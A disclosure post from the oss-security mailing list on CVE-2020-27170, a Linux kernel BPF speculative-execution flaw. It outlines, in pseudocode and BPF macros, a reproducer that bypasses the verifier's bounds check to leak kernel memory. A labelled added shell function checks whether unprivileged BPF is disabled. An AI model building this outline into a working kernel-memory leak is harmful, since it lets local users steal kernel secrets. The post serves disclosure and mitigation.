Date: Wed, 24 Mar 2021 19:34:50 +0000
From: Piotr Krysiuk <piotras@...il.com>
To: oss-security@...ts.openwall.com
Subject: Re: [CVE-2020-27170] Protection against speculatively out-of-bounds loads in the Linux kernel can be bypassed by unprivileged local users to leak content of kernel memory

Some details of how CVE-2020-27170 could be exploited in practice were
provided via linux-distros mailing list with 7 days embargo. This was
intended to help any affected Linux distributions to assess the risk and
decide about any appropriate actions. As the embargo expires today, I was
asked to share these details publicly on oss-security.

The CVE-2020-27170 vulnerability has been successfully reproduced against
Linux kernel v5.12-rc3 using the following logic for a BPF program attached
to a socket:

    load bpf_context pointer (BPF_REG_1) into BPF_REG_CTX,
    load pointer to our big array into BPF_REG_MAP_PTR,
    load offset of data to leak into BPF_REG_OFFSET,

    // load any slowly-loaded value...
    BPF_LDX_MEM(BPF_DW, BPF_REG_SLOW_CHECK, BPF_REG_MAP_PTR, 0x1200),
    // ... and turn it into known zero for verifier,
    // while preserving slowly-loaded dependency for affected hardware
    BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 1),
    BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 2),

    // speculatively bypassed offset check
    BPF_JMP_REG(BPF_JNE, BPF_REG_OFFSET, BPF_REG_SLOW_CHECK, skip_speculation),

    // speculatively unbounded pointer arithmetic
    BPF_ALU64_REG(BPF_ADD, BPF_REG_CTX, BPF_REG_OFFSET),

    // speculatively unbounded load
    BPF_LDX_MEM(BPF_W, BPF_REG_LEAKED_WORD, BPF_REG_CTX, offsetof(struct __sk_buff, protocol)),

    transmit speculatively loaded BPF_REG_LEAKED_WORD via side-channel,

The full reproducers were shared with a number of Linux distributions for
protection purposes.
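The reproducer above runs as a BPF program attached to a socket by an unprivileged local user, so the mitigation an administrator can apply without a kernel update is to stop unprivileged users from loading BPF programs at all. The shell function below is an added example, not part of the post or of any reproducer; it reads the kernel.unprivileged_bpf_disabled sysctl and reports whether unprivileged bpf() calls are allowed. It assumes the sysctl is exposed at /proc/sys/kernel/unprivileged_bpf_disabled (the path is a parameter so the function can be pointed at a constructed file); value 0 means allowed, 1 means disabled until reboot, 2 means disabled but changeable at runtime (the value 2 only exists on newer kernels).

```shell
#!/bin/sh
# Added example (not from the oss-security post): report whether
# unprivileged users may call bpf() on this host.
#
# Argument 1 (optional): path to the sysctl file; defaults to the real
# procfs location. Prints one word and returns 0 when unprivileged BPF
# is disabled, 1 when it is allowed, 2 when the state cannot be read.
unpriv_bpf_status() {
    sysctl_file="${1:-/proc/sys/kernel/unprivileged_bpf_disabled}"

    # Kernels built without CONFIG_BPF_SYSCALL have no such file.
    if [ ! -r "$sysctl_file" ]; then
        echo "unknown"
        return 2
    fi

    read -r value < "$sysctl_file"
    case "$value" in
        0) echo "allowed";           return 1 ;;
        1) echo "disabled";          return 0 ;;  # locked until reboot
        2) echo "disabled-runtime";  return 0 ;;  # can be set back to 0 later
        *) echo "unknown";           return 2 ;;
    esac
}

# Stand-alone use: print the state of the running kernel and exit with
# the function's return code so it can gate a hardening check.
if [ "${1:-}" = "--check" ]; then
    unpriv_bpf_status
    exit $?
fi
```

Run it as `sh unpriv_bpf.sh --check`; a non-zero exit means unprivileged BPF is still reachable and the host relies on the kernel fix alone.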